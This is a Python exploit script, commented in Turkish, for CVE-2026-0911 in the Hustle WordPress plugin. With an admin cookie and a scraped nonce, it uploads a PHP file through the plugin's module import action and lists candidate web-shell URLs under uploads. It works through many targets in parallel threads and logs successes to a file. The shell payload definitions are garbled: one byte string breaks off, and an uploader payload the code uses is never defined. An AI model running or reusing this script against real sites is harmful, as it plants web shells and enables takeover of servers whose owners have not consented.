#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2026-0911 — Hustle (wordpress-popup) kimlik doğrulamalı keyfi dosya yükleme / RCE öncesi test. Etkilenen: Hustle <= 7.8.9.2 — wp_handle_upload() test_type=false ile çağrılır, uzantı kontrolü zayıftır; başarısız import sonrası dosya silinmeyebilir (uploads altında yetim dosya). Ön koşullar (NVD / Wordfence): - Hustle yönetimine erişebilen kullanıcı için geçerli WordPress oturumu (çerez) ve hustle_single_action nonce (çoğunlukla yönetici Hustle/modül izni verdikten sonra). - moduleId=0 «yeni import» yolunda: ücretsiz kotanın yüklemeden önce engellememesi gerekir (aksi halde eklenti dosyayı yazmadan hata döner). YASAL: Yalnızca size ait veya yazılı test izniniz olan sistemlerde kullanın. Çıktının kaydedildiği yer ------------------------- Varsayılan: olası başarılı koşular (yetim yükleme sinyali) şu dosyaya **eklenir**: cve-2026-0911-hits.txt (betiği çalıştırdığınız çalışma dizini) Yol değiştirme: -o yol/çıktı.txt veya --output yol/çıktı.txt Biçim: hedef + açıklama satırı, altında girintili aday kabuk URL’leri (uploads/YYYY/MM/...). Başarılı satırlar tespit edilir edilmez anında diske yazılır. Kabuk / yükleme kodu -------------------- HTTP çok parçalı yükleme: ``post_hustle_import_upload()`` (``exploit_target`` içinden). Yük: ``DEFAULT_SHELL`` (sondaj) veya ``SHELL_UPLOADER_PHP`` (``--uploader``). """ from __future__ import annotations import argparse import json import re import sys import threading import os from concurrent.futures import ThreadPoolExecutor, as_completed from dataclasses import dataclass from datetime import datetime, timezone from pathlib import Path from typing import Callable, Optional from urllib.parse import urljoin import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Hustle yönetici AJAX eylemi (bkz. hustle-modules-common-admin-ajax.php) AJAX_ACTION = "hustle_module_handle_single_action" DEFAULT_PAGE = "hustle_popup_listing" # admin.php?page=... MODULE_TYPES = ("popup", "slidein", "embedded", "social_sharing") # Varsayılan: zararsız tek satırlık sondaj (yalnızca yetkili test). DEFAULT_SHELL = b"
""" ).encode("utf-8") @dataclass class ExploitResult: target: str ok: bool detail: str candidate_urls: list[str] def _session_from_cookie(cookie: str) -> requests.Session: s = requests.Session() s.headers.update( { "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-0911-arastirma/1.0)", "Accept": "text/html,application/json;q=0.9,*/*;q=0.8", } ) for part in cookie.split(";"): part = part.strip() if not part or "=" not in part: continue k, v = part.split("=", 1) k, v = k.strip(), v.strip() if k.lower() == "path": continue s.cookies.set(k, v, domain=None) return s def fetch_nonce( session: requests.Session, base_url: str, admin_page: str, verify_ssl: bool, timeout: float, log: Optional[Callable[[str], None]] = None, ) -> Optional[str]: """Hustle liste/sihirbaz HTML içinden optinVars.single_module_action_nonce ayrıştırır.""" admin_url = urljoin(base_url.rstrip("/") + "/", "wp-admin/admin.php") r = session.get( admin_url, params={"page": admin_page}, timeout=timeout, verify=verify_ssl, allow_redirects=True, ) if log: log(f" → GET (nonce) {r.url} — HTTP {r.status_code}") if r.status_code != 200: return None text = r.text # wp_localize_script: var optinVars = {...}; m = re.search( r'single_module_action_nonce"\s*:\s*"([a-zA-Z0-9_]+)"', text, ) if m: return m.group(1) # Yedek: farklı tırnak deseni m2 = re.search(r"single_module_action_nonce['\"]\s*:\s*['\"]([^'\"]+)['\"]", text) return m2.group(1) if m2 else None def post_hustle_import_upload( session: requests.Session, ajax_url: str, nonce: str, module_id: int, module_type: str, module_mode: str, remote_filename: str, file_body: bytes, verify_ssl: bool, timeout: float, ) -> requests.Response: """ CVE-2026-0911 çekirdeği: admin-ajax.php üzerinde çok parçalı POST — alan adı ``import_file`` olmalı (bkz. Hustle ``action_import_module()`` / ``$_FILES['import_file']``). """ files = { "import_file": ( remote_filename, file_body, "application/octet-stream", ) } data = { "action": AJAX_ACTION, "_wpnonce": nonce, "moduleId": str(module_id), "hustleAction": "import", "type": module_type, "module_mode": module_mode, "context": "listing", } return session.post( ajax_url, data=data, files=files, timeout=timeout, verify=verify_ssl, ) def build_upload_candidates(base_url: str, remote_name: str) -> list[str]: """WordPress varsayılan uploads/YYYY/MM yolu — sunucu yeniden adlandırabilir; tahmine dayalı liste.""" base = base_url.rstrip("/") now = datetime.now(timezone.utc) y, m = now.year, now.month clean = re.sub(r"[^\w.\-]", "_", remote_name) return [ f"{base}/wp-content/uploads/{y:04d}/{m:02d}/{clean}", f"{base}/wp-content/uploads/{y:04d}/{m:02d}/{clean}.php", ] def exploit_target( base_url: str, session: requests.Session, nonce: str, module_id: int, module_type: str, module_mode: str, remote_filename: str, file_body: bytes, verify_ssl: bool, timeout: float, debug: bool, log: Optional[Callable[[str], None]] = None, ) -> ExploitResult: base_url = base_url.rstrip("/") ajax_url = f"{base_url}/wp-admin/admin-ajax.php" try: r = post_hustle_import_upload( session, ajax_url, nonce, module_id, module_type, module_mode, remote_filename, file_body, verify_ssl, timeout, ) except requests.RequestException as e: return ExploitResult(base_url, False, f"İstek hatası: {e}", []) if log: log( f" → POST (import) {ajax_url} — HTTP {r.status_code}, " f"yanıt ~{len(r.text)} bayt" ) if debug: print(f" [ayıklama] HTTP {r.status_code} gövde[:400]={r.text[:400]!r}") body = r.text.strip() candidates = build_upload_candidates(base_url, remote_filename) # JSON hatası beklenir: yüklemeden sonra import JSON ayrıştırır — iletide sıkça «json» geçer. parsed: Optional[dict] = None try: parsed = r.json() except json.JSONDecodeError: jm = re.search(r"\{.*\}", body, re.DOTALL) if jm: try: parsed = json.loads(jm.group(0)) except json.JSONDecodeError: parsed = None if parsed is not None: success = parsed.get("success") msg = "" if isinstance(parsed.get("data"), dict): msg = str(parsed["data"].get("message", "")) if success is False: lower = msg.lower() if ( "json" in lower or "invalid" in lower or "configuration" in lower or "file must" in lower ): return ExploitResult( base_url, True, f"Sunucu importu reddetti (yetim yükleme sonrası beklenen): {msg or body[:200]}", candidates, ) return ExploitResult( base_url, False, f"Beklenmeyen hata: {msg or body[:300]}", candidates, ) if success is True: return ExploitResult( base_url, True, "Import başarı döndü (saf .php yükü için olağandışı; elle doğrulayın)", candidates, ) if r.status_code == 200 and body: return ExploitResult( base_url, False, f"JSON değil veya belirsiz yanıt: {body[:400]}", candidates, ) return ExploitResult( base_url, False, f"HTTP {r.status_code}: {body[:300]}", candidates, ) def load_targets(path: Path) -> list[str]: lines = path.read_text(encoding="utf-8", errors="replace").splitlines() return [ln.strip() for ln in lines if ln.strip() and not ln.strip().startswith("#")] def parse_args(argv: Optional[list[str]] = None) -> argparse.Namespace: p = argparse.ArgumentParser( description=( "CVE-2026-0911 Hustle modül importu — yetim yükleme denemesi (yalnızca yetkili kullanım)." ), ) p.add_argument( "-u", "--url", help="Tek hedef kök URL (örn. https://ornek.com)", ) p.add_argument( "-l", "--list", type=Path, help=( "Satır başına bir kök URL; # ile yorum. Aynı --cookie tüm satırlarda " "(her host için ayrı çalıştırmanız gerekebilir)" ), ) p.add_argument( "--cookie", help="Tam Cookie başlığı (örn. wordpress_logged_in_...=...)", ) p.add_argument( "--cookie-file", type=Path, help="Tek satır: Cookie dizgisi veya ad=değer çiftleri", ) p.add_argument( "--nonce", help="hustle_single_action için elle WordPress nonce (otomatik çekim yerine)", ) p.add_argument( "--admin-page", default=DEFAULT_PAGE, help=f"Nonce için admin.php?page= değeri (varsayılan: {DEFAULT_PAGE})", ) p.add_argument( "--module-id", type=int, default=0, help=( "POST moduleId; 0 geçersiz modül (WP_Error) tetikler, import başında " "hustle_create denetimini atlar" ), ) p.add_argument( "--module-type", choices=MODULE_TYPES, default="popup", help="Hustle modül türü", ) p.add_argument( "--module-mode", default="informational", help="POST module_mode (informational|optin)", ) p.add_argument( "--remote-name", default="probe_rce.php", help="import_file ile gönderilen uzak dosya adı (.php — JSON dalına sokulmasın)", ) p.add_argument( "--payload-file", type=Path, help="Kabuk baytlarını dosyadan oku (varsayılan sondaj ve --uploader üzerine yazar)", ) p.add_argument( "--uploader", action="store_true", help="Yerleşik PHP mini form-yükleyici gövdesini kullan (SHELL_UPLOADER_PHP)", ) p.add_argument( "--workers", type=int, default=8, help="-l ile eşzamanlı iş parçacığı sayısı", ) p.add_argument( "--timeout", type=float, default=25.0, help="İstek zaman aşımı (saniye)", ) p.add_argument( "--verify-ssl", action="store_true", help="TLS doğrula (varsayılan: kapalı)", ) p.add_argument( "--debug", action="store_true", help="Ayrıntılı ayıklama çıktısı", ) p.add_argument( "--quiet", action="store_true", help="Yalnızca özet; etki alanı ve adım loglarını gösterme", ) p.add_argument( "-o", "--output", type=Path, default=Path("cve-2026-0911-hits.txt"), help="Başarılı hedefler + aday URL’leri ekle (append)", ) return p.parse_args(argv) def main(argv: Optional[list[str]] = None) -> int: args = parse_args(argv) if not args.url and not args.list: print("--url veya --list verin", file=sys.stderr) return 2 cookie = args.cookie if args.cookie_file: cookie = args.cookie_file.read_text(encoding="utf-8", errors="replace").strip() if not cookie: print("--cookie veya --cookie-file verin", file=sys.stderr) return 2 if args.payload_file: file_body = args.payload_file.read_bytes() elif args.uploader: file_body = SHELL_UPLOADER_PHP else: file_body = DEFAULT_SHELL targets: list[str] = [] if args.url: targets.append(args.url.rstrip("/")) if args.list: targets.extend(load_targets(args.list)) verify_ssl = args.verify_ssl timeout = args.timeout verbose = not args.quiet out_lock = threading.Lock() log_lock = threading.Lock() out_path = args.output.resolve() def log(msg: str) -> None: if not verbose: return with log_lock: print(msg, flush=True) def append_hit_now(r: ExploitResult) -> None: """Başarılı sonucu hemen diske yazar (iş parçacığı güvenli).""" with out_lock: with args.output.open("a", encoding="utf-8") as f: f.write(f"{r.target}\t{r.detail}\n") for u in r.candidate_urls: f.write(f"\t{u}\n") f.flush() try: os.fsync(f.fileno()) except OSError: pass def run_one(base: str) -> ExploitResult: log(f"{'─'*60}") log(f"[*] Hedef: {base}") log( f" Adımlar: oturum → nonce → Hustle modül import (çok parçalı import_file) " f"→ JSON yanıt analizi" ) sess = _session_from_cookie(cookie) nonce = args.nonce if not nonce: log(f"[*] {base} | Nonce çekiliyor (yönetici sayfası: {args.admin_page})…") nonce = fetch_nonce( sess, base, args.admin_page, verify_ssl, timeout, log=log ) if not nonce: log(f"[-] {base} | Nonce yok (çerez / sayfa / yetki kontrol edin)") return ExploitResult( base, False, "single_module_action_nonce çıkarılamadı; --nonce verin veya --admin-page / çerez kontrol edin", [], ) log(f"[+] {base} | Nonce alındı ({nonce[:8]}…)") else: log(f"[*] {base} | Nonce komut satırından (--nonce)") log( f"[*] {base} | Yükleme: action={AJAX_ACTION}, hustleAction=import, " f"moduleId={args.module_id}, type={args.module_type}, " f"dosya={args.remote_name!r} ({len(file_body)} bayt)" ) if args.debug: with log_lock: print(f" [ayıklama] nonce={nonce[:6]}…", flush=True) res = exploit_target( base, sess, nonce, args.module_id, args.module_type, args.module_mode, args.remote_name, file_body, verify_ssl, timeout, args.debug, log=log if verbose else None, ) if res.ok: log(f"[+] {base} | Olası başarı (yetim yükleme sinyali): {res.detail[:120]}") for u in res.candidate_urls: log(f" Aday URL: {u}") else: log(f"[-] {base} | Başarısız: {res.detail[:160]}") return res results: list[ExploitResult] = [] if len(targets) == 1: r0 = run_one(targets[0]) results.append(r0) if r0.ok: append_hit_now(r0) log(f"[+] Dosyaya yazıldı → {out_path}") else: log(f"[*] {len(targets)} hedef, eşzamanlı işçi: {args.workers}") with ThreadPoolExecutor(max_workers=max(1, args.workers)) as ex: futs = {ex.submit(run_one, t): t for t in targets} for i, fut in enumerate(as_completed(futs), 1): r = fut.result() results.append(r) if r.ok: append_hit_now(r) log( f"[+] [{i}/{len(targets)}] İsabet dosyaya yazıldı | hedef: {r.target} → {out_path}" ) else: log(f"[.] [{i}/{len(targets)}] Bitti (isabet yok) | hedef: {r.target}") hits = [r for r in results if r.ok] print(f"\n{'='*60}") print(f"Bitti. Olası yetim-yükleme sinyali: {len(hits)}/{len(results)}") for r in results: durum = "OLASI" if r.ok else "yok" print(f" [{durum}] {r.target} — {r.detail}") for u in r.candidate_urls: print(f" dene: {u}") if hits: print( f"\n[i] İsabetler anında şuraya yazıldı: {out_path} ({len(hits)} kayıt kümesi)" ) else: print(f"\n[i] İsabet yok — {out_path} değişmedi") return 0 if hits else 1 if __name__ == "__main__": try: raise SystemExit(main()) except KeyboardInterrupt: print("\n[!] Kullanıcı tarafından kesildi", file=sys.stderr) raise SystemExit(130)